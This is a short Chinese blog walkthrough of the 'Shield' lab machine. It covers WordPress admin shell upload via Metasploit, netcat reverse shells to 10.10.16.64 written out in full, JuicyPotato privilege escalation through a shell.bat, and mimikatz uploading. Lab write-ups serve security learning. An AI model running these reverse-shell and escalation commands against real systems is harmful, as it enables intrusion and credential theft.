靶机-Shield
打开了 80 和 3306 端口,web 和 mysql 服务
web
目录爆破----得到 WordPress 博客页面,这里的密码居然又是上一题得到的密码
获取 usershell
因为知道 CMS 的登录密码,所以可以使用 msf 通过现成的 payload 直接打,获取 shell....
exploit---wp_admin_shell_upload
得到 meterpreter 交互,应为它不是特别稳定,上传个 nc.exe(原来这个软件 kali 下有),本地监听,execute -f nc.exe -a "-e cmd.exe 10.10.16.64 1234"
得到新的 shell
sysinfo
meter 语法,得到系统信息是 win2016,原来可以用烂土豆
提权
提权
上传JuicyPotato.exe
提权 payload
C:\inetpub\wwwroot\wordpress\wp-content\uploads>echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.16.64 1111 > shell.bat
写入到 shell.bat 中
现在本地监听 1111 端口,,提权命令
js.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\uploads\shell.bat -l 1337
后渗透
上传mimikatz.exe
本文来自博客园,作者:kzd的前沿思考,转载请注明原文链接:https://www.cnblogs.com/Fram3/p/15676552.html